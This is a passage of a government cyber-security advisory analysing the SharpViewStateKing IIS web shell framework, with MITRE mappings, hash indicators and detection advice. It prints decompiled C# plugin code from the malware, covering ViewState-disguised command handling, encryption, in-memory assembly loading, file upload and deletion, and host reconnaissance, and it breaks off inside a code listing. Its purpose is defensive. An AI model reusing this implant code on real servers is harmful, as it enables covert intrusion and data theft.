    <article data-history-node-id="7756" about="/en/news-events/sharpviewstateking-stealthy-implant-framework" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><p>The Canadian Centre for Cyber Security (Cyber Centre) is actively tracking a compromise that exploited several web shell payloads, enabling multiple hacking techniques. Following incident response activities, analysis revealed that the web shell was part of a stealthy implant framework called <strong>SharpViewStateKing</strong><sup id="fn1-rf"><a class="fn-lnk" href="#fn1"><span class="wb-inv">Footnote </span>1</a></sup>.</p> <p>The Cyber Centre has compiled a detailed analysis derived from a recent investigation to help defenders combat attacks leveraging these techniques. This analysis examines the <strong>use of standard ASP.NET HTTP requests to blend in with traffic</strong> and provides an <strong>in-depth characterization of the threat actor’s techniques</strong>, along with critical mitigation and detection guidance.</p> <section><details class="mrgn-tp-md"><summary><h2 class="h3">Table of contents</h2> </summary><ul class="list-unstyled"><li><a href="#1">Executive summary</a></li> <li><a href="#2">An incident overview</a></li> <li><a href="#3">Analysis of the incident</a></li> <li><a href="#4">Plugin capabilities observed during analysis</a></li> <li><a href="#5">Indicators of compromise and recommendations</a></li> <li><a href="#6">Cyber Centre tools and services</a></li> <li><a href="#7">Acknowledgments</a></li> <li><a href="#8">References</a></li> </ul></details></section><h2 class="text-info" id="1">Executive summary</h2> <p>In late December 2025, the Cyber Centre detected what appeared to be a web shell on a public-facing Microsoft Internet Information Services (IIS) server running a commercially available ASP.NET application. Incident response activities were initiated and analysis revealed that this web shell was part of a stealthy implant framework called SharpViewStateKing. This technical article aims to raise awareness, provide detection guidance, and highlight remediation actions associated with the malicious modules. What follows is derived from endpoint telemetry and process memory captured during the incident.</p> <h2 class="text-info" id="2">An incident overview</h2> <section class="alert alert-info"><p><strong>Note:</strong> MITRE ATT&amp;CK technique reference numbers have been integrated throughout the article to standardize threat descriptions.</p> </section><p>SharpViewStateKing is a modular framework consisting of a graphical user interface (GUI) that enables the loading of ASP.NET modules (plugins) into exploited <abbr title="Internet Information Services">IIS</abbr> servers.</p> <div class="clearfix"> </div> <figure><figcaption class="h4 text-center">Figure 1: SharpViewStateKing controller <abbr title="graphical user interface">GUI</abbr></figcaption><img alt="Fig 1: SharpViewStateKing controller GUI – Long description immediately follows" class="img-responsive" src="/sites/default/files/images/sharpviewstateking-fig1-e.png" /></figure><details><summary>Figure 1 long description – SharpViewStateKing controller <abbr title="graphical user interface">GUI</abbr></summary><p>The figure displays the <abbr title="graphical user interface">GUI</abbr> of the SharpViewStateKing controller, featuring a modular layout that enables the loading and management of ASP.NET plugins on compromised <abbr title="Internet Information Services">IIS</abbr> servers. The interface includes controls for selecting plugins, executing commands, and monitoring the status of loaded modules, designed to facilitate threat actor operations while remaining discreet.</p> </details><div class="clearfix"> </div> <p>Plugins are written in the C# programming language and embedded as serialized .NET objects in the <strong>Resource</strong> section of the SharpViewStateKing executable (<a href="https://attack.mitre.org/techniques/T1505/003/">T1505.003</a>, <a href="https://attack.mitre.org/techniques/T1620/">T1620</a>).</p> <div class="clearfix"> </div> <figure><figcaption class="h4 text-center">Figure 2: SharpViewStateKing payload-resource <abbr title="JavaScript Object Notation">JSON</abbr> file</figcaption><img alt="Fig 2: SharpViewStateKing payload-resource JSON file – Long description immediately follows" class="img-responsive" src="/sites/default/files/images/sharpviewstateking-fig2-e.png" /></figure><details><summary>Figure 2 long description – SharpViewStateKing payload-resource <abbr title="JavaScript Object Notation">JSON</abbr> file</summary><p><strong> </strong>The figure displays an <abbr title="hypertext transfer protocol">HTTP</abbr> response body rendered in a <abbr title="JavaScript Object Notation">JSON</abbr> inspector. The payload is a single <abbr title="JavaScript Object Notation">JSON</abbr> object whose keys correspond to remote procedure/command endpoints, and each value is a long base64-encoded binary blob. <abbr title="user interface">UI</abbr> controls and tabs indicate this is a developer or proxy tool viewing the structured response.</p> </details><div class="clearfix"> </div> <p>Remote code execution was achieved by leveraging compromised ViewState parameters in the ASP.NET application running on the compromised <abbr title="Internet Information Services">IIS</abbr> server<sup id="fn2-rf"><a class="fn-lnk" href="#fn2"><span class="wb-inv">Footnote </span>2</a></sup> (<a href="https://attack.mitre.org/techniques/T1190/">T1190</a>). Although the method of how these parameters were obtained is out of scope for this document, an example of how these were leveraged in a separate malware campaign can be found in the Cyber Centre’s publication on SharePoint vulnerabilities.</p> <p>Traditional web shells typically operate by creating a new page on the web server or by injecting code that intercepts <abbr title="hypertext transfer protocol">HTTP</abbr> requests directed to legitimate web pages. This enables threat actors to interact with the compromised server, as the web  shell can respond to requests from their command and control (C2) infrastructure. However, through the analysis of endpoint telemetry and process memory captured during the incident, the Cyber Centre identified a novel technique.</p> <p>This analysis indicated that the threat actor likely leveraged the SharpViewStateKing implant framework to deploy new compiled plugins for every command sent to the compromised server, rendering it functionally stateless (<a href="https://attack.mitre.org/techniques/T1620/">T1620</a>). Additionally, the deployed plugin code remained resident in memory, even when dormant, until the process restarted.</p> <p>Detection opportunities for this implant family are limited due to the following factors:</p> <ul><li>plugins are compiled on the threat actor’s host immediately before being sent to the target server. Since compilation actions did not take place on the exploited server, the <strong><code>csc.exe</code></strong> (C# compiler) process was never observed, and hash-based detections became challenging due to dynamically generated compilation timestamps that occur immediately prior to loading the module</li> <li>network communications occur over legitimate looking <abbr title="hypertext transfer protocol">HTTP</abbr> or <abbr title="hypertext transfer protocol secure">HTTPS</abbr> traffic. In this incident the traffic was encrypted over <abbr title="hypertext transfer protocol secure">HTTPS</abbr> which limited visibility (<a href="https://attack.mitre.org/techniques/T1071/001/">T1071.001</a>).</li> <li>plugins are loaded directly into the <abbr title="Internet Information Services">IIS</abbr> process memory on the compromised server. They were never written to disk (<a href="https://attack.mitre.org/techniques/T1620/">T1620</a>)</li> <li>loaded plugins do not appear in the list of loaded modules (dynamic-link library or DLL) for the <abbr title="Internet Information Services">IIS</abbr> server process</li> </ul><p>Despite these limitations, the Cyber Centre was able to identify several noteworthy insights:</p> <ul><li>C# can be decompiled back into a readable C# source code. Since it was compiled into an intermediate language (bytecode), the compilation process could be reversed using CCCS’ open-source file triage platform, <a href="/en/tools-services/assemblyline">Assemblyline</a>. By implementing a decompiler service for C# bytecode, custom YARA rules could be created to target C# code instead of compiled DLLs, resulting in more flexible detection rules</li> <li>with certain configurations, the Anti-Malware Scan Interface (AMSI) mechanism is triggered when .NET code modules are loaded into memory. Although the malware appeared to have <abbr title="Anti-Malware Scan Interface">AMSI</abbr>-bypass capabilities, they were not deployed during this specific incident, allowing traditional anti-virus programs to inspect the bytecode</li> <li>the implant uses a static string for the <strong><code>__VIEWSTATE</code></strong> parameter in <abbr title="hypertext transfer protocol">HTTP</abbr> POST requests. This string was found in process memory when the plugins were loaded</li> <li>in some scenarios, ViewState deserialization errors can be written to server logs when loading the plugins due to the hard-coded <strong><code>__VIEWSTATE</code></strong> However, in this incident no deserialization errors were observed</li> <li>also associated with the Godzilla implant, <strong><code>__SCROLLPATH</code></strong> and/or <strong><code>__SCROLLPOSITION</code></strong> header fields in <abbr title="hypertext transfer protocol">HTTP</abbr> server logs can be used as indicators. Since some legitimate software uses fields with these names, they were not strong indicators by themselves</li> <li>the compilation/link time in the resulting Portable Executable (PE) file header will be recent, within seconds of it being loaded. Since this is not uncommon for ASP.NET pages, they were not strong indicators by themselves</li> <li>detection opportunities will arise as the threat actor stages new capabilities on the compromised host or uses living off the land (LOTL) binaries as part of their post-exploitation activities. An effective method of detection was to monitor children of the <abbr title="Internet Information Services">IIS</abbr> <strong><code>w3wp.exe</code></strong> worker process</li> </ul><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <h2 class="text-info" id="3">Analysis of the incident</h2> <p>Within the first 30 minutes of the incident, 67 distinct code modules based on their SHA-256 hash were deployed to the compromised host. Once decompiled, it became apparent that there was significant duplication. For example, 42 different copies of the FileUpload plugin, each with its own unique hash, were used to stage and execute several different capabilities via the RemoteExec plugin, as listed below:</p> <ul><li><strong>EfsPotato:</strong> one of many in the "Potato” exploit family, EfsPotato is an open-source local privilege escalation tool used in cyberattacks to elevate user permissions from a low-privileged service account to the highest level of authority on Windows systems (<strong><code>NT AUTHORITY\SYSTEM</code></strong>) (<a href="https://attack.mitre.org/techniques/T1068/">T1068</a>, <a href="https://attack.mitre.org/techniques/T1134/001/">T1134.001</a>)</li> <li><strong>SoftEther <abbr title="virtual private network">VPN</abbr>:</strong> open-source, cross-platform, multi-protocol <abbr title="virtual private network">VPN</abbr> client and <abbr title="virtual private network">VPN</abbr> server software used by the threat actor to traverse network address translation (NAT) and bypass firewalls for remote desktop protocol (RDP) connections (<a href="https://attack.mitre.org/techniques/T1133/">T1133</a>)</li> <li><strong>rar.exe:</strong> command-line file archiver and compression tool that is part of the powerful archive manager WinRAR; used to extract files staged for execution and compress files for exfiltration (<a href="https://attack.mitre.org/techniques/T1560/001/">T1560.001</a>)</li> <li><strong>secretsdump.exe:</strong> compiled version of the Impacket secretsdump.py<sup id="fn3-rf"><a class="fn-lnk" href="#fn3"><span class="wb-inv">Footnote </span>3</a></sup> tool used to extract various sensitive secrets from a host, including user hashes, data protection application programming interface (DPAPI) secrets, clear text credentials, and more (<a href="https://attack.mitre.org/techniques/T1003/002/">T1003.002</a>)</li> <li><strong>perunner.exe:</strong> tool used to extract memory from the Local Security Authority Subsystem Service (LSASS) process (<a href="https://attack.mitre.org/techniques/T1003/002/">T1003.002</a>)</li> <li><strong>fuck.exe:</strong> custom executable used to modify the <strong><code>ValidationKey</code></strong> and <strong><code>DecryptionKey</code></strong> values in the web.config of the compromised web application (<a href="https://attack.mitre.org/techniques/T1556/001/">T1556.001</a>)<br /> SHA-256: <strong><code>2FF2E5B7DA1A70886DB220E0806ABA24AD6648BA2DC40E101D5D718D1BCBD7B6</code></strong></li> <li><strong>bypass.exe: </strong>SHA-256: <strong><code>6DF013608D0BEC6D2743AD45108C43922DBFDE28DDBEC8B8D63F3E0B23401DF2</code></strong></li> <li><strong>HttpCgiModule.dll: </strong>32-bit component of the BadIIS implant<br /> SHA-256: <strong><code>637c7bd4d2b5c29cc2f6db802ed1cd4d4c9b49ef7e6751a38d22f9337361c2cf</code></strong></li> <li><strong>HttpFastCgiModule.dll: </strong>64-bit component of the BadIIS implant<br /> SHA-256: <strong><code>b6a009dc9984bf49e84e4885c87bcc0ce371f98ab2c28e71d5ebbcc0855adfce</code></strong></li> </ul><p>By leveraging the RemoteExec plugin, the threat actor created a new administrator account on the compromised host (<a href="https://attack.mitre.org/techniques/T1136/001/">T1136.001</a>) then launched <strong><code>wmic.exe</code></strong> to configure exclusions in Microsoft Defender (<a href="https://attack.mitre.org/techniques/T1562/001/">T1562.001</a>), effectively neutering it. The new account and the SoftEther <abbr title="virtual private network">VPN</abbr> access were then used to log in remotely via <abbr title="remote desktop protocol">RDP</abbr> and move laterally to other hosts using PsExec (<a href="https://attack.mitre.org/techniques/T1569/002/">T1569.002</a>, <a href="https://attack.mitre.org/techniques/T1021/002/">T1021.002</a>) and the credentials harvested using the tools listed above (<a href="https://attack.mitre.org/techniques/T1078/">T1078</a>).</p> <h2 class="text-info" id="4">Plugin capabilities observed during analysis</h2> <p>The information below is based on the SharpViewStateKing plugins deployed by the threat actor and extracted from <abbr title="Internet Information Services">IIS</abbr> process memory. To avoid redundancy, the following three methods were found in each of the payloads:</p> <h3>Constructor</h3> <p>The <abbr title="hypertext transfer protocol">HTTP</abbr> request handler (the communication interface) received encrypted commands from the threat actor, executed them, encrypted the results, then sent them back disguised as normal web traffic. The constructor’s logic is as follow:</p> <ul><li>gets the current <abbr title="hypertext transfer protocol">HTTP</abbr> context (the web request being processed) and associated <abbr title="hypertext transfer protocol">HTTP</abbr> objects</li> <li>extracts the <strong><code>__SCROLLPATH</code></strong> and/or <strong><code>__SCROLLPOSITION</code></strong> parameters from the request (threat actor-controlled input), then decodes from Base64 to get raw bytes</li> <li>calls <strong><code>Dec()</code></strong> to decrypt the raw bytes</li> <li>calls a plugin-specific function with these arguments to perform an action</li> <li>converts the output to UTF-8 bytes, calls <strong><code>Enc()</code></strong> to encrypt the bytes, then Base64-encodes the encrypted result</li> <li>disguises the output by embedding it in ASP.NET ViewState properties <ul><li> <pre> <code>&lt;input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTcyODc4…" /&gt;</code></pre> </li> <li>The prefix <strong><code>/wEPDwUKLTcyODc4</code></strong> remains static and mimics legitimate ViewState to avoid triggering security tools</li> </ul></li> <li>sends the response as HTML back to the threat actor</li> </ul><div class="clearfix"> </div> <h4 class="text-center">Figure 3: Constructor for FileUpload plugin</h4> <div class="container"> <pre> <code> public class FileUpload { public FileUpload() { HttpContext current = HttpContext.Current; try { if (HttpContext.Current != null) { HttpRequest request = current.Request; HttpResponse response = current.Response; byte[] content = Dec(Convert.FromBase64String(request["__SCROLLPOSITION"])); byte[] bytes = Dec(Convert.FromBase64String(request["__SCROLLPATH"])); string s = UploadFile(content, Encoding.UTF8.GetString(bytes)); response.Write("&lt;input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTcyODc4" + Convert.ToBase64String(Enc(Encoding.UTF8.GetBytes(s))) + "" /&gt;"); response.End(); } } catch (Exception ex) { current.Response.Write(ex.Message); current.Response.End(); } } } </code> </pre> </div> <details><summary>Figure 3 long description – Constructor for FileUpload plugin</summary><p>The figure shows a C# code snippet defining a FileUpload class whose constructor uses HttpContext.Current to handle an <abbr title="hypertext transfer protocol">HTTP</abbr> request and response within a try-catch block. It reads two Base64-encoded values from the request, decodes them into a byte array and a path string, calls UploadFile with the content and decoded path, then writes a hidden input containing an encoded VIEWSTATE value to the response before ending it. On exception, it writes the error message to the response and terminates the request.</p> </details><div class="clearfix"> </div> <h3>Decrypt function</h3> <p>This method decrypted data received from the threat actor via the <strong><code>__SCROLLPATH</code></strong> and/or <strong><code>__SCROLLPOSITION</code></strong> <abbr title="hypertext transfer protocol">HTTP</abbr> header fields. It was used in every observed plugin except for ListDirectory, which did not encrypt its lone path argument.</p> <p>Rijndael-128 in CBC mode (AES-128-CBC) is used as the encryption/decryption algorithm (<a href="https://attack.mitre.org/techniques/T1573/001/">T1573.001</a>). The first 32-bytes of the buffer passed to the function are used as the symmetric decryption key and initialization vector (IV).</p> <div class="clearfix"> </div> <h4 class="text-center">Figure 4: Decrypt function using Rijndael-128 in CBC mode (AES-128-CBC)</h4> <div class="container"> <pre> <code> public static byte[] Dec(byte[] data) { byte[] array = new byte[16]; byte[] array2 = new byte[16]; Array.Copy(data, 0, array, 0, 16); Array.Copy(data, 16, array2, 0, 16); Console.WriteLine(new Guid(array)); Console.WriteLine(new Guid(array2)); MemoryStream memoryStream = new MemoryStream(); RijndaelManaged rijndaelManaged = new RijndaelManaged(); rijndaelManaged.BlockSize = 128; rijndaelManaged.KeySize = 128; rijndaelManaged.Mode = CipherMode.CBC; rijndaelManaged.Padding = PaddingMode.PKCS7; CryptoStream cryptoStream = new CryptoStream(memoryStream, rijndaelManaged.CreateDecryptor(array2, array), CryptoStreamMode.Write); cryptoStream.Write(data, 32, data.Length – 32); cryptoStream.FlushFinalBlock(); return memoryStream.ToArray(); } </code> </pre> </div> <details><summary>Figure 4 long description – Decrypt function using Rijndael-128 in CBC mode (AES-128-CBC)</summary><p>The figure shows a C# method Dec that decrypts a byte array using Rijndael-128 in CBC mode (AES-128-CBC) with PKCS7 padding. It splits the input into two 16-byte segments for <abbr title="initialization vector">IV</abbr> and key, logs them as <abbr title="Global Unique Identifiers">GUIDs</abbr>, configures a Rijndael-managed instance (128-bit block and key sizes), then creates a CryptoStream to decrypt the remaining bytes (from offset 32 onward) and returns the resulting plaintext as a new byte array. The code uses a MemoryStream to collect the decrypted data and flushes the final block before conversion.</p> </details><div class="clearfix"> </div> <p>Since both values are written directly to the request data without any cryptographic protection of their own, they can be recovered from server <abbr title="hypertext transfer protocol">HTTP</abbr> logs or network captures. This is possible if <abbr title="hypertext transfer protocol">HTTP</abbr> was used as the application layer protocol, or if <abbr title="hypertext transfer protocol secure">HTTPS</abbr> was de-encapsulated. Leveraging these values to decrypt uploaded data would then be a trivial matter, using a tool like <a href="https://gchq.github.io/CyberChef/">CyberChef</a>.</p> <h3>Encrypt function</h3> <p>Plugins encrypt data before sending it back to the threat actor via the <abbr title="hypertext transfer protocol">HTTP</abbr> response using Rijndael-128 in CBC mode (AES-128-CBC) (<a href="https://attack.mitre.org/techniques/T1573/001/">T1573.001</a>). The symmetric encryption key and initialization vector (IV) are generated pseudo-randomly using <strong><code>Guid.NewGuid().ToByteArray()</code></strong> and prepended to the encrypted response data. The <strong><code>Guid.NewGuid()</code></strong> method is not considered cryptographically secure and guarantees, at most, 122 bits of entropy.</p> <div class="clearfix"> </div> <h4 class="text-center">Figure 5: Encrypt function using Rijndael (AES-128) in CBC mode</h4> <div class="container"> <pre> <code> public static byte[] Enc(byte[] data) { byte[] array = Guid.NewGuid().ToByteArray(); byte[] array2 = Guid.NewGuid().ToByteArray(); MemoryStream memoryStream = new MemoryStream(); memoryStream.Write(array, 0, array.Length); memoryStream.Write(array2, 0, array2.Length); RijndaelManaged rijndaelManaged = new RijndaelManaged(); rijndaelManaged.BlockSize = 128; rijndaelManaged.KeySize = 128; rijndaelManaged.Mode = CipherMode.CBC; rijndaelManaged.Padding = PaddingMode.PKCS7; CryptoStream cryptoStream = new CryptoStream(memoryStream, rijndaelManaged.CreateEncryptor(array2, array), CryptoStreamMode.Write); cryptoStream.Write(data, 0, data.Length); cryptoStream.FlushFinalBlock(); return memoryStream.ToArray(); } </code> </pre> </div> <details><summary>Figure 5 long description – Encrypt function using Rijndael (AES-128) in CBC mode</summary><p>The figure shows a C# method Enc that encrypts a byte array using Rijndael-128 in CBC mode (AES-128-CBC) with PKCS7 padding. It generates two <abbr title="Global Unique Identifiers">GUIDs</abbr> to serve as the <abbr title="initialization vector">IV</abbr> and key, writes them to a MemoryStream prefixing the ciphertext, then uses a CryptoStream to encrypt the input data and flushes the final block before returning the combined byte array. The configuration sets both block size and key size to 128 bits, producing an output that begins with the <abbr title="initialization vector">IV</abbr> and key followed by the encrypted payload.</p> </details><div class="clearfix"> </div> <p>Since both values are written directly to the response data without any cryptographic protection of their own, they can be recovered from server <abbr title="hypertext transfer protocol">HTTP</abbr> logs or network captures. This is possible if <abbr title="hypertext transfer protocol">HTTP</abbr> was used as the application layer protocol, or if <abbr title="hypertext transfer protocol secure">HTTPS</abbr> was de-encapsulated. Leveraging these values to decrypt exfiltrated data would then be a trivial matter, if using a tool like <a href="https://gchq.github.io/CyberChef/">CyberChef</a>.</p> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <h3>Observation 1</h3> <p><strong>Main capability</strong>: ExecuteAssembly</p> <p><strong>Observed technique</strong>: ExecuteAssembly (<a href="https://attack.mitre.org/techniques/T1620/">T1620</a>)</p> <p>This plugin implements a class that enables the threat actor to load an arbitrary ASP.NET assembly directly from a memory buffer, providing the threat actor with fileless execution capability for post-exploitation and allowing them to bypass disk-based detection. For example, it was used to load and execute the EfsPotato privilege escalation exploit directly into the memory of the compromised host.</p> <p>The plugin includes two methods:</p> <ol><li><strong>ParseArgs(string input):</strong> takes a raw command-line argument string and parses it into a properly formatted string array by iterating through each character while tracking quote boundaries with a Boolean flag. <ul><li>This allowed the payload to receive arguments exactly as if they were launched from the command-line, making in-memory execution behave like a normal program launch and enabling the threat actor to pass command-line parameters to malicious .NET assemblies.</li> </ul></li> <li><strong>ExecuteAssembly(byte[] assembly, byte[] bArgs):</strong> redirects <strong><code>Console.Out</code></strong> and <strong><code>Console.Error</code></strong> streams to an in-memory <strong><code>MemoryStream</code></strong> and uses <strong><code>Assembly.Load()</code></strong> to load the .NET assembly bytes directly into process memory without writing to disk. <ul><li>This retrieved the assembly’s <strong><code>Main</code></strong> method using <strong><code>ENTRYPOINT</code></strong> instructions then invoked it with the parsed command-line arguments, capturing all console output (<strong><code>stdout/stderr</code></strong>) produced during execution into <strong><code>MemoryStream</code></strong> and converting it to a UTF-8 string. The result was returned via <abbr title="hypertext transfer protocol">HTTP</abbr> response by the constructor.</li> </ul></li> </ol><div class="clearfix"> </div> <h4 class="text-center">Figure 6: ExecuteAssembly method in LoadAndExecuteAssembly class</h4> <div class="container"> <pre> <code> public class LoadAndExecuteAssembly { public static string ExecuteAssembly(byte[] assembly, byte[] bArgs) { string empty = string.Empty; try { TextWriter textWriter = Console.Out; TextWriter error = Console.Error; MemoryStream memoryStream = new MemoryStream(); StreamWriter streamWriter = new StreamWriter(memoryStream); streamWriter.AutoFlush = true; Console.SetOut(streamWriter); Console.SetError(streamWriter); Assembly assembly2 = Assembly.Load(assembly); MethodInfo entryPoint = assembly2.EntryPoint; string[] array = ParseArgs(Encoding.UTF8.GetString(bArgs)); entryPoint.Invoke(null, new object[1] { array }); empty = Encoding.UTF8.GetString(memoryStream.ToArray()); Console.SetOut(textWriter); Console.SetError(error); streamWriter.Close(); memoryStream.Close(); } catch (Exception ex) { empty = "Error: " + ex; } return empty; } } </code> </pre> </div> <details><summary>Figure 6 long description – ExecuteAssembly method in LoadAndExecuteAssembly class</summary><p>The figure shows a C# class LoadAndExecuteAssembly with a public static method ExecuteAssembly that loads a .NET assembly from a byte array and invokes its entry point with arguments parsed from another byte array. Before invocation, it redirects Console.Out and Console.Error to a MemoryStream via a StreamWriter to capture all console output, then restores the original streams and returns the captured text; on failure, it returns a formatted error string. The code manages resources by closing the writer and stream after execution.</p> </details><div class="clearfix"> </div> <h3>Observation 2</h3> <p><strong>Main capability:</strong> FileDelete</p> <p><strong>Observed technique:</strong> FileDelete (<a href="https://attack.mitre.org/techniques/T1070/004/">T1070.004</a>)</p> <p>This plugin implements a class that enables the threat actor to remotely delete a file from the victim’s filesystem. It receives an encrypted file path via <abbr title="hypertext transfer protocol">HTTP</abbr>, deletes the specified file, then returns an encrypted confirmation message. The threat actor used this capability to cover their tracks and delete previously staged files.</p> <div class="clearfix"> </div> <h4 class="text-center">Figure 7: fileDelete method in FileDelete class</h4> <div class="container"> <pre> <code> public class FileDelete { public static string fileDelete(string filePath) { try { if (File.Exists(filePath)) { File.Delete(filePath); } return "Delete successful"; } catch (Exception ex) { return ex.Message; } } } </code> </pre> </div> <details><summary>Figure 7 long description – fileDelete method in FileDelete class</summary><p>The figure displays a snippet of C# code defining a class named FileDelete with a public static method, fileDelete, that accepts a file path string. Inside a try-catch block, the method checks if the file exists, deletes it if present, and returns “Delete successful”; if an exception occurs, it returns the exception’s message.</p> </details><div class="clearfix"> </div> <h3>Observation 3</h3> <p><strong>Main capability:</strong> FileUpload</p> <p><strong>Observed technique:</strong> FileUpload (<a href="https://attack.mitre.org/techniques/T1608/001/">T1608.001</a>)</p> <p>This plugin implements a class that enables the threat actor to remotely upload files to the victim’s filesystem. It received an encrypted file path and its contents via <abbr title="hypertext transfer protocol">HTTP</abbr>, wrote the content to the specified path, then returned an encrypted confirmation message.</p> <div class="clearfix"> </div> <h4 class="text-center">Figure 8: UploadFile method in FileUpload class</h4> <div class="container"> <pre> <code> public class FileUpload { public static string UploadFile(byte[] content, string filePath) { try { FileStream fileStream = new FileStream(filePath, FileMode.Append); fileStream.Write(content, 0, content.Length); fileStream.Close(); return "Upload successful"; } catch (Exception ex) { return ex.Message; } } } </code> </pre> </div> <details><summary>Figure 8 long description – UploadFile method in FileUpload class</summary><p>The figure shows a C# code snippet defining a class named FileUpload with a public static method UploadFile that takes a byte array and a file path. Inside a try-catch block, it opens a FileStream in append mode, writes the byte content to the file, closes the stream, and returns “Upload successful,” while any exception results in returning the exception’s message.</p> </details><div class="clearfix"> </div> <h3>Observation 4</h3> <p><strong>Main capability:</strong> Information</p> <p><strong>Observed technique:</strong> Information (<a href="https://attack.mitre.org/techniques/T1082/">T1082</a>, <a href="https://attack.mitre.org/techniques/T1057/">T1057</a>)</p> <p>This was the first plugin deployed to the compromised host. It implemented a class that retrieved the following detailed system information in a <abbr title="JavaScript Object Notation">JSON</abbr> string:</p> <ul><li>current working directory for the process</li> <li>current “web” directory for the process</li> <li>content from two registry keys<br /><strong><code>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName</code></strong><br /><strong><code>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentVersion</code></strong></li> <li>all disk drives, including free space</li> <li>all network interfaces</li> <li>all running processes</li> </ul><div class="clearfix"> </div> <h4 class="text-center">Figure 9: GetSystemInformation method in Information class</h4> <div class="container"> <pre> <code> public class Information { public static string GetSystemInformation(string data = null) { string currentDirectory = Directory.GetCurrentDirectory(); string text = $" Current Directory: {currentDirectory}\r\n"; text += string.Format("Current Web Directory: {0}\r\n\r\n", HttpContext.Current.Server.MapPath(".")); RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"); if (registryKey != null) { text += string.Format("Windows Product Name: {0}\r\n", registryKey.GetValue("ProductName")); text += string.Format(" Windows Version: {0}\r\n\r\n", registryKey.GetValue("CurrentVersion")); } DriveInfo[] drives = DriveInfo.GetDrives(); foreach (DriveInfo driveInfo in drives) { if (driveInfo.IsReady) { text += $"Disk drive {driveInfo.Name}\r\n"; text += $" Disk size: {driveInfo.TotalSize / 1024L / 1024L / 1024L} GB\r\n"; text += $" Free space: {driveInfo.AvailableFreeSpace / 1024L / 1024L / 1024L} GB\r\n"; } } text += "\r\n"; NetworkInterface[] allNetworkInterfaces = NetworkInterface.GetAllNetworkInterfaces(); NetworkInterface[] array = allNetworkInterfaces; foreach (NetworkInterface networkInterface in array) { if (networkInterface.Name.ToLower().Contains("loopback")) { continue; } IPInterfaceProperties iPProperties = networkInterface.GetIPProperties(); UnicastIPAddressInformationCollection unicastAddresses = iPProperties.UnicastAddresses; string text2 = string.Empty; string text3 = string.Empty; foreach (UnicastIPAddressInformation item in unicastAddresses) { if (item.Address.AddressFamily != AddressFamily.InterNetwork) { if (item.Address.AddressFamily == AddressFamily.InterNetworkV6) { text3 = string.Concat(text3, item.Address, ","); } } else { text2 = string.Concat(text2, item.Address, ","); } } string text4 = string.Empty; if (iPProperties.DnsAddresses.Any()) { Console.WriteLine("DNS Servers:"); foreach (IPAddress dnsAddress in iPProperties.DnsAddresses) { text4 = string.Concat(text4, dnsAddress, ","); } } text += $"Network adapter: {networkInterface.Description}\r\n"; text += $" MAC address: {networkInterface.GetPhysicalAddress().ToString()}\r\n"; text += $" IP addresses: {text2.Trim() + text3.Trim().Trim(new char[1] { ‘,’ })}\r\n"; text += $" DNS Server: {text4}\r\n"; } text += "\r\n-&gt;||"; Process[] processes = Process.GetProcesses(); foreach (Process process in processes) { text = text + process.ProcessName + ".exe,"; } return text + "||&lt;-"; } } </code> </pre> </div> <details><summary>Figure 9 long description – GetSystemInformation method in Information class</summary><p>The figure contains a public static method GetSystemInformation that builds a detailed string of system data. It queries current web directories, reads Windows product and version from the registry, enumerates drives to report disk sizes and free space, and iterates network interfaces to collect IP addresses while skipping the loopback adapter.</p> </details><div class="clearfix"> </div> <h3>Observation 5</h3> <p><strong>Main capability:</strong> ListDirectory</p> <p><strong>Observed technique:</strong> ListDirectory (<a href="https://attack.mitre.org/techniques/T1083/">T1083</a>)</p> <p>This plugin implemented a class that enabled the threat actor to enumerate and retrieve detailed information on files and directories on the victim’s filesystem using the following two methods:</p> <ol><li><strong>list_directory(string path):</strong> listed all files and folders in a specified directory <ul><li>used <strong><code>DirectoryInfo</code></strong> to access the target directory and <strong><code>GetFileSystemInfos()</code></strong> to retrieve all files and subdirectories</li> <li>for each file or folder item, it called <strong><code>GetIcon()</code></strong> to retrieve the visual icon and create a <strong><code>MemoryStream</code></strong> (temporary memory buffer) to hold image data and save the icon as a PNG image into the <strong><code>MemoryStream</code></strong></li> <li>checked if the item was a directory or a file using <strong><code>FileAttributes</code></strong>, and any file size was retrieved in bytes</li> <li>built a tab-separated string containing: <ul><li>file name</li> <li>full path</li> <li>IsDirectory flag (true/false)</li> <li>icon data encoded as Base64</li> <li>last modified timestamp (format: yyyy-mm-dd hh:mm:ss)</li> <li>file size (0 for directories)</li> </ul></li> </ul></li> </ol><div class="clearfix"> </div> <h4 class="text-center">Figure 10: list_directory method in ListDirectory</h4> <div class="container"> <pre> <code> public class ListDirectory { public static string list_directory(string path) { StringBuilder stringBuilder = new StringBuilder(); try { DirectoryInfo directoryInfo = new DirectoryInfo(path); FileSystemInfo[] fileSystemInfos = directoryInfo.GetFileSystemInfos(); FileSystemInfo[] array = fileSystemInfos; foreach (FileSystemInfo fileSystemInfo in array) { MemoryStream memoryStream = new MemoryStream(); string text = "0"; bool flag = true; ((Image)GetIcon(fileSystemInfo.FullName)).Save((Stream)memoryStream, ImageFormat.Png); if ((fileSystemInfo.Attributes &amp; FileAttributes.Directory) != FileAttributes.Directory) { flag = false; text = new FileInfo(fileSystemInfo.FullName).Length.ToString(); } stringBuilder.Append(string.Format("{0}\t{1}\t{2}\t{3}\t{4}\t{5}\r\n", fileSystemInfo.Name, fileSystemInfo.FullName, flag, 